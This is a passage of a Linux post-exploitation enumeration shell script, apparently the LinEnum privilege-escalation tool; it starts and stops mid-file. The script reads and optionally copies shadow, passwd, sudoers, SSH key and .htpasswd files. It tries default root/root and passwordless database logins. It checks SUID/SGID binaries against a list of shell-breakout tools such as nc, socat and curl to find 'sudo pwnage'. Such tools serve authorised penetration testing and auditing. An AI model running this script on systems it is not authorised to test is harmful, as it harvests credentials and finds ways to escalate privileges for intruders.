binarylist='aria2c\|arp\|ash\|awk\|base64\|bash\|busybox\|cat\|chmod\|chown\|cp\|csh\|curl\|cut\|dash\|date\|dd\|diff\|dmsetup\|docker\|ed\|emacs\|env\|expand\|expect\|file\|find\|flock\|fmt\|fold\|ftp\|gawk\|gdb\|gimp\|git\|grep\|head\|ht\|iftop\|ionice\|ip$\|irb\|jjs\|jq\|jrunscript\|ksh\|ld.so\|ldconfig\|less\|logsave\|lua\|make\|man\|mawk\|more\|mv\|mysql\|nano\|nawk\|nc\|netcat\|nice\|nl\|nmap\|node\|od\|openssl\|perl\|pg\|php\|pic\|pico\|python\|readelf\|rlwrap\|rpm\|rpmquery\|rsync\|ruby\|run-parts\|rvim\|scp\|script\|sed\|setarch\|sftp\|sh\|shuf\|socat\|sort\|sqlite3\|ssh$\|start-stop-daemon\|stdbuf\|strace\|systemctl\|tail\|tar\|taskset\|tclsh\|tee\|telnet\|tftp\|time\|timeout\|ul\|unexpand\|uniq\|unshare\|vi\|vim\|watch\|wget\|wish\|xargs\|xxd\|zip\|zsh'
system_info()
{
echo -e "\e[00;33m### SYSTEM ##############################################\e[00m"
#basic kernel info
unameinfo=`uname -a 2>/dev/null`
if [ "$unameinfo" ]; then
echo -e "\e[00;31m[-] Kernel information:\e[00m\n$unameinfo"
echo -e "\n"
fi
procver=`cat /proc/version 2>/dev/null`
if [ "$procver" ]; then
echo -e "\e[00;31m[-] Kernel information (continued):\e[00m\n$procver"
echo -e "\n"
fi
#search all *-release files for version info
release=`cat /etc/*-release 2>/dev/null`
if [ "$release" ]; then
echo -e "\e[00;31m[-] Specific release information:\e[00m\n$release"
echo -e "\n"
fi
#target hostname info
hostnamed=`hostname 2>/dev/null`
if [ "$hostnamed" ]; then
echo -e "\e[00;31m[-] Hostname:\e[00m\n$hostnamed"
echo -e "\n"
fi
}
user_info()
{
echo -e "\e[00;33m### USER/GROUP ##########################################\e[00m"
#current user details
currusr=`id 2>/dev/null`
if [ "$currusr" ]; then
echo -e "\e[00;31m[-] Current user/group info:\e[00m\n$currusr"
echo -e "\n"
fi
#last logged on user information
lastlogedonusrs=`lastlog 2>/dev/null |grep -v "Never" 2>/dev/null`
if [ "$lastlogedonusrs" ]; then
echo -e "\e[00;31m[-] Users that have previously logged onto the system:\e[00m\n$lastlogedonusrs"
echo -e "\n"
fi
#who else is logged on
loggedonusrs=`w 2>/dev/null`
if [ "$loggedonusrs" ]; then
echo -e "\e[00;31m[-] Who else is logged on:\e[00m\n$loggedonusrs"
echo -e "\n"
fi
#lists all id's and respective group(s)
grpinfo=`for i in $(cut -d":" -f1 /etc/passwd 2>/dev/null);do id $i;done 2>/dev/null`
if [ "$grpinfo" ]; then
echo -e "\e[00;31m[-] Group memberships:\e[00m\n$grpinfo"
echo -e "\n"
fi
#added by phackt - look for adm group (thanks patrick)
adm_users=$(echo -e "$grpinfo" | grep "(adm)")
if [[ ! -z $adm_users ]];
then
echo -e "\e[00;31m[-] It looks like we have some admin users:\e[00m\n$adm_users"
echo -e "\n"
fi
#checks to see if any hashes are stored in /etc/passwd (deprecated *nix storage method)
hashesinpasswd=`grep -v '^[^:]*:[x]' /etc/passwd 2>/dev/null`
if [ "$hashesinpasswd" ]; then
echo -e "\e[00;33m[+] It looks like we have password hashes in /etc/passwd!\e[00m\n$hashesinpasswd"
echo -e "\n"
fi
#contents of /etc/passwd
readpasswd=`cat /etc/passwd 2>/dev/null`
if [ "$readpasswd" ]; then
echo -e "\e[00;31m[-] Contents of /etc/passwd:\e[00m\n$readpasswd"
echo -e "\n"
fi
if [ "$export" ] && [ "$readpasswd" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/passwd $format/etc-export/passwd 2>/dev/null
fi
#checks to see if the shadow file can be read
readshadow=`cat /etc/shadow 2>/dev/null`
if [ "$readshadow" ]; then
echo -e "\e[00;33m[+] We can read the shadow file!\e[00m\n$readshadow"
echo -e "\n"
fi
if [ "$export" ] && [ "$readshadow" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/shadow $format/etc-export/shadow 2>/dev/null
fi
#checks to see if /etc/master.passwd can be read - BSD 'shadow' variant
readmasterpasswd=`cat /etc/master.passwd 2>/dev/null`
if [ "$readmasterpasswd" ]; then
echo -e "\e[00;33m[+] We can read the master.passwd file!\e[00m\n$readmasterpasswd"
echo -e "\n"
fi
if [ "$export" ] && [ "$readmasterpasswd" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/master.passwd $format/etc-export/master.passwd 2>/dev/null
fi
#all root accounts (uid 0)
superman=`grep -v -E "^#" /etc/passwd 2>/dev/null| awk -F: '$3 == 0 { print $1}' 2>/dev/null`
if [ "$superman" ]; then
echo -e "\e[00;31m[-] Super user account(s):\e[00m\n$superman"
echo -e "\n"
fi
#pull out vital sudoers info
sudoers=`grep -v -e '^$' /etc/sudoers 2>/dev/null |grep -v "#" 2>/dev/null`
if [ "$sudoers" ]; then
echo -e "\e[00;31m[-] Sudoers configuration (condensed):\e[00m$sudoers"
echo -e "\n"
fi
if [ "$export" ] && [ "$sudoers" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/sudoers $format/etc-export/sudoers 2>/dev/null
fi
#can we sudo without supplying a password
sudoperms=`echo '' | sudo -S -l -k 2>/dev/null`
if [ "$sudoperms" ]; then
echo -e "\e[00;33m[+] We can sudo without supplying a password!\e[00m\n$sudoperms"
echo -e "\n"
fi
#check sudo perms - authenticated
if [ "$sudopass" ]; then
if [ "$sudoperms" ]; then
:
else
sudoauth=`echo $userpassword | sudo -S -l -k 2>/dev/null`
if [ "$sudoauth" ]; then
echo -e "\e[00;33m[+] We can sudo when supplying a password!\e[00m\n$sudoauth"
echo -e "\n"
fi
fi
fi
##known 'good' breakout binaries (cleaned to parse /etc/sudoers for comma separated values) - authenticated
if [ "$sudopass" ]; then
if [ "$sudoperms" ]; then
:
else
sudopermscheck=`echo $userpassword | sudo -S -l -k 2>/dev/null | xargs -n 1 2>/dev/null|sed 's/,*$//g' 2>/dev/null | grep -w $binarylist 2>/dev/null`
if [ "$sudopermscheck" ]; then
echo -e "\e[00;33m[-] Possible sudo pwnage!\e[00m\n$sudopermscheck"
echo -e "\n"
fi
fi
fi
#known 'good' breakout binaries (cleaned to parse /etc/sudoers for comma separated values)
sudopwnage=`echo '' | sudo -S -l -k 2>/dev/null | xargs -n 1 2>/dev/null | sed 's/,*$//g' 2>/dev/null | grep -w $binarylist 2>/dev/null`
if [ "$sudopwnage" ]; then
echo -e "\e[00;33m[+] Possible sudo pwnage!\e[00m\n$sudopwnage"
echo -e "\n"
fi
#who has sudoed in the past
whohasbeensudo=`find /home -name .sudo_as_admin_successful 2>/dev/null`
if [ "$whohasbeensudo" ]; then
echo -e "\e[00;31m[-] Accounts that have recently used sudo:\e[00m\n$whohasbeensudo"
echo -e "\n"
fi
#checks to see if roots home directory is accessible
rthmdir=`ls -ahl /root/ 2>/dev/null`
if [ "$rthmdir" ]; then
echo -e "\e[00;33m[+] We can read root's home directory!\e[00m\n$rthmdir"
echo -e "\n"
fi
#displays /home directory permissions - check if any are lax
homedirperms=`ls -ahl /home/ 2>/dev/null`
if [ "$homedirperms" ]; then
echo -e "\e[00;31m[-] Are permissions on /home directories lax:\e[00m\n$homedirperms"
echo -e "\n"
fi
#looks for files we can write to that don't belong to us
if [ "$thorough" = "1" ]; then
grfilesall=`find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null`
if [ "$grfilesall" ]; then
echo -e "\e[00;31m[-] Files not owned by user but writable by group:\e[00m\n$grfilesall"
echo -e "\n"
fi
fi
#looks for files that belong to us
if [ "$thorough" = "1" ]; then
ourfilesall=`find / -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null`
if [ "$ourfilesall" ]; then
echo -e "\e[00;31m[-] Files owned by our user:\e[00m\n$ourfilesall"
echo -e "\n"
fi
fi
#looks for hidden files
if [ "$thorough" = "1" ]; then
hiddenfiles=`find / -name ".*" -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null`
if [ "$hiddenfiles" ]; then
echo -e "\e[00;31m[-] Hidden files:\e[00m\n$hiddenfiles"
echo -e "\n"
fi
fi
#looks for world-readable files within /home - depending on number of /home dirs & files, this can take some time so is only 'activated' with thorough scanning switch
if [ "$thorough" = "1" ]; then
wrfileshm=`find /home/ -perm -4 -type f -exec ls -al {} \; 2>/dev/null`
if [ "$wrfileshm" ]; then
echo -e "\e[00;31m[-] World-readable files within /home:\e[00m\n$wrfileshm"
echo -e "\n"
fi
fi
if [ "$thorough" = "1" ]; then
if [ "$export" ] && [ "$wrfileshm" ]; then
mkdir $format/wr-files/ 2>/dev/null
for i in $wrfileshm; do cp --parents $i $format/wr-files/ ; done 2>/dev/null
fi
fi
#lists current user's home directory contents
if [ "$thorough" = "1" ]; then
homedircontents=`ls -ahl ~ 2>/dev/null`
if [ "$homedircontents" ] ; then
echo -e "\e[00;31m[-] Home directory contents:\e[00m\n$homedircontents"
echo -e "\n"
fi
fi
#checks for if various ssh files are accessible - this can take some time so is only 'activated' with thorough scanning switch
if [ "$thorough" = "1" ]; then
sshfiles=`find / \( -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" \) -exec ls -la {} 2>/dev/null \;`
if [ "$sshfiles" ]; then
echo -e "\e[00;31m[-] SSH keys/host information found in the following locations:\e[00m\n$sshfiles"
echo -e "\n"
fi
fi
if [ "$thorough" = "1" ]; then
if [ "$export" ] && [ "$sshfiles" ]; then
mkdir $format/ssh-files/ 2>/dev/null
for i in $sshfiles; do cp --parents $i $format/ssh-files/; done 2>/dev/null
fi
fi
#is root permitted to login via ssh
sshrootlogin=`grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | awk '{print $2}'`
if [ "$sshrootlogin" = "yes" ]; then
echo -e "\e[00;31m[-] Root is allowed to login via SSH:\e[00m" ; grep "PermitRootLogin " /etc/ssh/sshd_config 2>/dev/null | grep -v "#"
echo -e "\n"
fi
}
environmental_info()
{
echo -e "\e[00;33m### ENVIRONMENTAL #######################################\e[00m"
#env information
envinfo=`env 2>/dev/null | grep -v 'LS_COLORS' 2>/dev/null`
if [ "$envinfo" ]; then
echo -e "\e[00;31m[-] Environment information:\e[00m\n$envinfo"
echo -e "\n"
fi
#check if selinux is enabled
sestatus=`sestatus 2>/dev/null`
if [ "$sestatus" ]; then
echo -e "\e[00;31m[-] SELinux seems to be present:\e[00m\n$sestatus"
echo -e "\n"
fi
#phackt
#current path configuration
pathinfo=`echo $PATH 2>/dev/null`
if [ "$pathinfo" ]; then
pathswriteable=`ls -ld $(echo $PATH | tr ":" " ")`
echo -e "\e[00;31m[-] Path information:\e[00m\n$pathinfo"
echo -e "$pathswriteable"
echo -e "\n"
fi
#lists available shells
shellinfo=`cat /etc/shells 2>/dev/null`
if [ "$shellinfo" ]; then
echo -e "\e[00;31m[-] Available shells:\e[00m\n$shellinfo"
echo -e "\n"
fi
#current umask value with both octal and symbolic output
umaskvalue=`umask -S 2>/dev/null; umask 2>/dev/null`
if [ "$umaskvalue" ]; then
echo -e "\e[00;31m[-] Current umask value:\e[00m\n$umaskvalue"
echo -e "\n"
fi
#umask value as in /etc/login.defs
umaskdef=`grep -i "^UMASK" /etc/login.defs 2>/dev/null`
if [ "$umaskdef" ]; then
echo -e "\e[00;31m[-] umask value as specified in /etc/login.defs:\e[00m\n$umaskdef"
echo -e "\n"
fi
#password policy information as stored in /etc/login.defs
logindefs=`grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null`
if [ "$logindefs" ]; then
echo -e "\e[00;31m[-] Password and storage information:\e[00m\n$logindefs"
echo -e "\n"
fi
if [ "$export" ] && [ "$logindefs" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/login.defs $format/etc-export/login.defs 2>/dev/null
fi
}
job_info()
{
echo -e "\e[00;33m### JOBS/TASKS ##########################################\e[00m"
#are there any cron jobs configured
cronjobs=`ls -la /etc/cron* 2>/dev/null`
if [ "$cronjobs" ]; then
echo -e "\e[00;31m[-] Cron jobs:\e[00m\n$cronjobs"
echo -e "\n"
fi
#can we manipulate these jobs in any way
cronjobwwperms=`find /etc/cron* -perm -0002 -type f -exec ls -la {} \; -exec cat {} 2>/dev/null \;`
if [ "$cronjobwwperms" ]; then
echo -e "\e[00;33m[+] World-writable cron jobs and file contents:\e[00m\n$cronjobwwperms"
echo -e "\n"
fi
#crontab contents
crontabvalue=`cat /etc/crontab 2>/dev/null`
if [ "$crontabvalue" ]; then
echo -e "\e[00;31m[-] Crontab contents:\e[00m\n$crontabvalue"
echo -e "\n"
fi
crontabvar=`ls -la /var/spool/cron/crontabs 2>/dev/null`
if [ "$crontabvar" ]; then
echo -e "\e[00;31m[-] Anything interesting in /var/spool/cron/crontabs:\e[00m\n$crontabvar"
echo -e "\n"
fi
anacronjobs=`ls -la /etc/anacrontab 2>/dev/null; cat /etc/anacrontab 2>/dev/null`
if [ "$anacronjobs" ]; then
echo -e "\e[00;31m[-] Anacron jobs and associated file permissions:\e[00m\n$anacronjobs"
echo -e "\n"
fi
anacrontab=`ls -la /var/spool/anacron 2>/dev/null`
if [ "$anacrontab" ]; then
echo -e "\e[00;31m[-] When were jobs last executed (/var/spool/anacron contents):\e[00m\n$anacrontab"
echo -e "\n"
fi
#pull out account names from /etc/passwd and see if any users have associated cronjobs (priv command)
cronother=`cut -d ":" -f 1 /etc/passwd | xargs -n1 crontab -l -u 2>/dev/null`
if [ "$cronother" ]; then
echo -e "\e[00;31m[-] Jobs held by all users:\e[00m\n$cronother"
echo -e "\n"
fi
# list systemd timers
if [ "$thorough" = "1" ]; then
# include inactive timers in thorough mode
systemdtimers="$(systemctl list-timers --all 2>/dev/null)"
info=""
else
systemdtimers="$(systemctl list-timers 2>/dev/null |head -n -1 2>/dev/null)"
# replace the info in the output with a hint towards thorough mode
info="\e[2mEnable thorough tests to see inactive timers\e[00m"
fi
if [ "$systemdtimers" ]; then
echo -e "\e[00;31m[-] Systemd timers:\e[00m\n$systemdtimers\n$info"
echo -e "\n"
fi
}
networking_info()
{
echo -e "\e[00;33m### NETWORKING ##########################################\e[00m"
#nic information
nicinfo=`/sbin/ifconfig -a 2>/dev/null`
if [ "$nicinfo" ]; then
echo -e "\e[00;31m[-] Network and IP info:\e[00m\n$nicinfo"
echo -e "\n"
fi
#nic information (using ip)
nicinfoip=`/sbin/ip a 2>/dev/null`
if [ ! "$nicinfo" ] && [ "$nicinfoip" ]; then
echo -e "\e[00;31m[-] Network and IP info:\e[00m\n$nicinfoip"
echo -e "\n"
fi
arpinfo=`arp -a 2>/dev/null`
if [ "$arpinfo" ]; then
echo -e "\e[00;31m[-] ARP history:\e[00m\n$arpinfo"
echo -e "\n"
fi
arpinfoip=`ip n 2>/dev/null`
if [ ! "$arpinfo" ] && [ "$arpinfoip" ]; then
echo -e "\e[00;31m[-] ARP history:\e[00m\n$arpinfoip"
echo -e "\n"
fi
#dns settings
nsinfo=`grep "nameserver" /etc/resolv.conf 2>/dev/null`
if [ "$nsinfo" ]; then
echo -e "\e[00;31m[-] Nameserver(s):\e[00m\n$nsinfo"
echo -e "\n"
fi
nsinfosysd=`systemd-resolve --status 2>/dev/null`
if [ "$nsinfosysd" ]; then
echo -e "\e[00;31m[-] Nameserver(s):\e[00m\n$nsinfosysd"
echo -e "\n"
fi
#default route configuration
defroute=`route 2>/dev/null | grep default`
if [ "$defroute" ]; then
echo -e "\e[00;31m[-] Default route:\e[00m\n$defroute"
echo -e "\n"
fi
#default route configuration
defrouteip=`ip r 2>/dev/null | grep default`
if [ ! "$defroute" ] && [ "$defrouteip" ]; then
echo -e "\e[00;31m[-] Default route:\e[00m\n$defrouteip"
echo -e "\n"
fi
#listening TCP
tcpservs=`netstat -ntpl 2>/dev/null`
if [ "$tcpservs" ]; then
echo -e "\e[00;31m[-] Listening TCP:\e[00m\n$tcpservs"
echo -e "\n"
fi
tcpservsip=`ss -t -l -n 2>/dev/null`
if [ ! "$tcpservs" ] && [ "$tcpservsip" ]; then
echo -e "\e[00;31m[-] Listening TCP:\e[00m\n$tcpservsip"
echo -e "\n"
fi
#listening UDP
udpservs=`netstat -nupl 2>/dev/null`
if [ "$udpservs" ]; then
echo -e "\e[00;31m[-] Listening UDP:\e[00m\n$udpservs"
echo -e "\n"
fi
udpservsip=`ss -u -l -n 2>/dev/null`
if [ ! "$udpservs" ] && [ "$udpservsip" ]; then
echo -e "\e[00;31m[-] Listening UDP:\e[00m\n$udpservsip"
echo -e "\n"
fi
}
services_info()
{
echo -e "\e[00;33m### SERVICES #############################################\e[00m"
#running processes
psaux=`ps aux 2>/dev/null`
if [ "$psaux" ]; then
echo -e "\e[00;31m[-] Running processes:\e[00m\n$psaux"
echo -e "\n"
fi
#lookup process binary path and permissions
procperm=`ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null`
if [ "$procperm" ]; then
echo -e "\e[00;31m[-] Process binaries and associated permissions (from above list):\e[00m\n$procperm"
echo -e "\n"
fi
if [ "$export" ] && [ "$procperm" ]; then
procpermbase=`ps aux 2>/dev/null | awk '{print $11}' | xargs -r ls 2>/dev/null | awk '!x[$0]++' 2>/dev/null`
mkdir $format/ps-export/ 2>/dev/null
for i in $procpermbase; do cp --parents $i $format/ps-export/; done 2>/dev/null
fi
#anything 'useful' in inetd.conf
inetdread=`cat /etc/inetd.conf 2>/dev/null`
if [ "$inetdread" ]; then
echo -e "\e[00;31m[-] Contents of /etc/inetd.conf:\e[00m\n$inetdread"
echo -e "\n"
fi
if [ "$export" ] && [ "$inetdread" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/inetd.conf $format/etc-export/inetd.conf 2>/dev/null
fi
#very 'rough' command to extract associated binaries from inetd.conf & show permissions of each
inetdbinperms=`awk '{print $7}' /etc/inetd.conf 2>/dev/null |xargs -r ls -la 2>/dev/null`
if [ "$inetdbinperms" ]; then
echo -e "\e[00;31m[-] The related inetd binary permissions:\e[00m\n$inetdbinperms"
echo -e "\n"
fi
xinetdread=`cat /etc/xinetd.conf 2>/dev/null`
if [ "$xinetdread" ]; then
echo -e "\e[00;31m[-] Contents of /etc/xinetd.conf:\e[00m\n$xinetdread"
echo -e "\n"
fi
if [ "$export" ] && [ "$xinetdread" ]; then
mkdir $format/etc-export/ 2>/dev/null
cp /etc/xinetd.conf $format/etc-export/xinetd.conf 2>/dev/null
fi
xinetdincd=`grep "/etc/xinetd.d" /etc/xinetd.conf 2>/dev/null`
if [ "$xinetdincd" ]; then
echo -e "\e[00;31m[-] /etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below:\e[00m"; ls -la /etc/xinetd.d 2>/dev/null
echo -e "\n"
fi
#very 'rough' command to extract associated binaries from xinetd.conf & show permissions of each
xinetdbinperms=`awk '{print $7}' /etc/xinetd.conf 2>/dev/null |xargs -r ls -la 2>/dev/null`
if [ "$xinetdbinperms" ]; then
echo -e "\e[00;31m[-] The related xinetd binary permissions:\e[00m\n$xinetdbinperms"
echo -e "\n"
fi
initdread=`ls -la /etc/init.d 2>/dev/null`
if [ "$initdread" ]; then
echo -e "\e[00;31m[-] /etc/init.d/ binary permissions:\e[00m\n$initdread"
echo -e "\n"
fi
#init.d files NOT belonging to root!
initdperms=`find /etc/init.d/ \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`
if [ "$initdperms" ]; then
echo -e "\e[00;31m[-] /etc/init.d/ files not belonging to root:\e[00m\n$initdperms"
echo -e "\n"
fi
rcdread=`ls -la /etc/rc.d/init.d 2>/dev/null`
if [ "$rcdread" ]; then
echo -e "\e[00;31m[-] /etc/rc.d/init.d binary permissions:\e[00m\n$rcdread"
echo -e "\n"
fi
#init.d files NOT belonging to root!
rcdperms=`find /etc/rc.d/init.d \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`
if [ "$rcdperms" ]; then
echo -e "\e[00;31m[-] /etc/rc.d/init.d files not belonging to root:\e[00m\n$rcdperms"
echo -e "\n"
fi
usrrcdread=`ls -la /usr/local/etc/rc.d 2>/dev/null`
if [ "$usrrcdread" ]; then
echo -e "\e[00;31m[-] /usr/local/etc/rc.d binary permissions:\e[00m\n$usrrcdread"
echo -e "\n"
fi
#rc.d files NOT belonging to root!
usrrcdperms=`find /usr/local/etc/rc.d \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`
if [ "$usrrcdperms" ]; then
echo -e "\e[00;31m[-] /usr/local/etc/rc.d files not belonging to root:\e[00m\n$usrrcdperms"
echo -e "\n"
fi
initread=`ls -la /etc/init/ 2>/dev/null`
if [ "$initread" ]; then
echo -e "\e[00;31m[-] /etc/init/ config file permissions:\e[00m\n$initread"
echo -e "\n"
fi
# upstart scripts not belonging to root
initperms=`find /etc/init \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`
if [ "$initperms" ]; then
echo -e "\e[00;31m[-] /etc/init/ config files not belonging to root:\e[00m\n$initperms"
echo -e "\n"
fi
systemdread=`ls -lthR /lib/systemd/ 2>/dev/null`
if [ "$systemdread" ]; then
echo -e "\e[00;31m[-] /lib/systemd/* config file permissions:\e[00m\n$systemdread"
echo -e "\n"
fi
# systemd files not belonging to root
systemdperms=`find /lib/systemd/ \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null`
if [ "$systemdperms" ]; then
echo -e "\e[00;33m[+] /lib/systemd/* config files not belonging to root:\e[00m\n$systemdperms"
echo -e "\n"
fi
}
software_configs()
{
echo -e "\e[00;33m### SOFTWARE #############################################\e[00m"
#sudo version - check to see if there are any known vulnerabilities with this
sudover=`sudo -V 2>/dev/null| grep "Sudo version" 2>/dev/null`
if [ "$sudover" ]; then
echo -e "\e[00;31m[-] Sudo version:\e[00m\n$sudover"
echo -e "\n"
fi
#mysql details - if installed
mysqlver=`mysql --version 2>/dev/null`
if [ "$mysqlver" ]; then
echo -e "\e[00;31m[-] MYSQL version:\e[00m\n$mysqlver"
echo -e "\n"
fi
#checks to see if root/root will get us a connection
mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null`
if [ "$mysqlconnect" ]; then
echo -e "\e[00;33m[+] We can connect to the local MYSQL service with default root/root credentials!\e[00m\n$mysqlconnect"
echo -e "\n"
fi
#mysql version details
mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null`
if [ "$mysqlconnectnopass" ]; then
echo -e "\e[00;33m[+] We can connect to the local MYSQL service as 'root' and without a password!\e[00m\n$mysqlconnectnopass"
echo -e "\n"
fi
#postgres details - if installed
postgver=`psql -V 2>/dev/null`
if [ "$postgver" ]; then
echo -e "\e[00;31m[-] Postgres version:\e[00m\n$postgver"
echo -e "\n"
fi
#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
postcon1=`psql -U postgres -w template0 -c 'select version()' 2>/dev/null | grep version`
if [ "$postcon1" ]; then
echo -e "\e[00;33m[+] We can connect to Postgres DB 'template0' as user 'postgres' with no password!:\e[00m\n$postcon1"
echo -e "\n"
fi
postcon11=`psql -U postgres -w template1 -c 'select version()' 2>/dev/null | grep version`
if [ "$postcon11" ]; then
echo -e "\e[00;33m[+] We can connect to Postgres DB 'template1' as user 'postgres' with no password!:\e[00m\n$postcon11"
echo -e "\n"
fi
postcon2=`psql -U pgsql -w template0 -c 'select version()' 2>/dev/null | grep version`
if [ "$postcon2" ]; then
echo -e "\e[00;33m[+] We can connect to Postgres DB 'template0' as user 'psql' with no password!:\e[00m\n$postcon2"
echo -e "\n"
fi
postcon22=`psql -U pgsql -w template1 -c 'select version()' 2>/dev/null | grep version`
if [ "$postcon22" ]; then
echo -e "\e[00;33m[+] We can connect to Postgres DB 'template1' as user 'psql' with no password!:\e[00m\n$postcon22"
echo -e "\n"
fi
#apache details - if installed
apachever=`apache2 -v 2>/dev/null; httpd -v 2>/dev/null`
if [ "$apachever" ]; then
echo -e "\e[00;31m[-] Apache version:\e[00m\n$apachever"
echo -e "\n"
fi
#what account is apache running under
apacheusr=`grep -i 'user\|group' /etc/apache2/envvars 2>/dev/null |awk '{sub(/.*\export /,"")}1' 2>/dev/null`
if [ "$apacheusr" ]; then
echo -e "\e[00;31m[-] Apache user configuration:\e[00m\n$apacheusr"
echo -e "\n"
fi
if [ "$export" ] && [ "$apacheusr" ]; then
mkdir --parents $format/etc-export/apache2/ 2>/dev/null
cp /etc/apache2/envvars $format/etc-export/apache2/envvars 2>/dev/null
fi
#installed apache modules
apachemodules=`apache2ctl -M 2>/dev/null; httpd -M 2>/dev/null`
if [ "$apachemodules" ]; then
echo -e "\e[00;31m[-] Installed Apache modules:\e[00m\n$apachemodules"
echo -e "\n"
fi
#htpasswd check
htpasswd=`find / -name .htpasswd -print -exec cat {} \; 2>/dev/null`
if [ "$htpasswd" ]; then
echo -e "\e[00;33m[-] htpasswd found - could contain passwords:\e[00m\n$htpasswd"
echo -e "\n"
fi
#anything in the default http home dirs (a thorough only check as output can be large)
if [ "$thorough" = "1" ]; then
apachehomedirs=`ls -alhR /var/www/ 2>/dev/null; ls -alhR /srv/www/htdocs/ 2>/dev/null; ls -alhR /usr/local/www/apache2/data/ 2>/dev/null; ls -alhR /opt/lampp/htdocs/ 2>/dev/null`
if [ "$apachehomedirs" ]; then
echo -e "\e[00;31m[-] www home dir contents:\e[00m\n$apachehomedirs"
echo -e "\n"
fi
fi
}
interesting_files()
{
echo -e "\e[00;33m### INTERESTING FILES ####################################\e[00m"
#checks to see if various files are installed
echo -e "\e[00;31m[-] Useful file locations:\e[00m" ; which nc 2>/dev/null ; which netcat 2>/dev/null ; which wget 2>/dev/null ; which nmap 2>/dev/null ; which gcc 2>/dev/null; which curl 2>/dev/null
echo -e "\n"
#limited search for installed compilers
compiler=`dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null`
if [ "$compiler" ]; then
echo -e "\e[00;31m[-] Installed compilers:\e[00m\n$compiler"
echo -e "\n"
fi
#manual check - lists out sensitive files, can we read/modify etc.
echo -e "\e[00;31m[-] Can we read/write sensitive files:\e[00m" ; ls -la /etc/passwd 2>/dev/null ; ls -la /etc/group 2>/dev/null ; ls -la /etc/profile 2>/dev/null; ls -la /etc/shadow 2>/dev/null ; ls -la /etc/master.passwd 2>/dev/null
echo -e "\n"
#search for suid files
allsuid=`find / -perm -4000 -type f 2>/dev/null`
findsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} 2>/dev/null \;`
if [ "$findsuid" ]; then
echo -e "\e[00;31m[-] SUID files:\e[00m\n$findsuid"
echo -e "\n"
fi
if [ "$export" ] && [ "$findsuid" ]; then
mkdir $format/suid-files/ 2>/dev/null
for i in $findsuid; do cp $i $format/suid-files/; done 2>/dev/null
fi
#list of 'interesting' suid files - feel free to make additions
intsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null`
if [ "$intsuid" ]; then
echo -e "\e[00;33m[+] Possibly interesting SUID files:\e[00m\n$intsuid"
echo -e "\n"
fi
#lists world-writable suid files
wwsuid=`find $allsuid -perm -4002 -type f -exec ls -la {} 2>/dev/null \;`
if [ "$wwsuid" ]; then
echo -e "\e[00;33m[+] World-writable SUID files:\e[00m\n$wwsuid"
echo -e "\n"
fi
#lists world-writable suid files owned by root
wwsuidrt=`find $allsuid -uid 0 -perm -4002 -type f -exec ls -la {} 2>/dev/null \;`
if [ "$wwsuidrt" ]; then
echo -e "\e[00;33m[+] World-writable SUID files owned by root:\e[00m\n$wwsuidrt"
echo -e "\n"
fi
#search for sgid files
allsgid=`find / -perm -2000 -type f 2>/dev/null`
findsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} 2>/dev/null \;`
if [ "$findsgid" ]; then
echo -e "\e[00;31m[-] SGID files:\e[00m\n$findsgid"
echo -e "\n"
fi
if [ "$export" ] && [ "$findsgid" ]; then
mkdir $format/sgid-files/ 2>/dev/null
for i in $findsgid; do cp $i $format/sgid-files/; done 2>/dev/null
fi
#list of 'interesting' sgid files
intsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null`
if [ "$intsgid" ]; then
echo -e "\e[00;33m[+] Possibly interesting SGID files:\e[00m\n$intsgid"
echo -e "\n"
fi
#lists world-writable sgid files
wwsgid=`find $allsgid -perm -2002 -type f -exec ls -la {} 2>/dev/null \;`
if [ "$wwsgid" ]; then
echo -e "\e[00;33m[+] World-writable SGID files:\e[00m\n$wwsgid"
echo -e "\n"
fi
#lists world-writable sgid files owned by root
wwsgidrt=`find $allsgid -uid 0 -perm -2002 -type f -exec ls -la {} 2>/dev/null \;`
if [ "$wwsgidrt" ]; then
echo -e "\e[00;33m[+] World-writable SGID files owned by root:\e[00m\n$wwsgidrt"
echo -e "\n"
fi
#list all files with POSIX capabilities set along with their capabilities
fileswithcaps=`getcap -r / 2>/dev/null || /sbin/getcap -r / 2>/dev/null`
if [ "$fileswithcaps" ]; then
echo -e "\e[00;31m[+] Files with POSIX capabilities set:\e[00m\n$fileswithcaps"
echo -e "\n"
fi
if [ "$export" ] && [ "$fileswithcaps" ]; then
mkdir $format/files_with_capabilities/ 2>/dev/null
for i in $fileswithcaps; do cp $i $format/files_with_capabilities/; done 2>/dev/null
fi
#searches /etc/security/capability.conf for capabilities associated with users
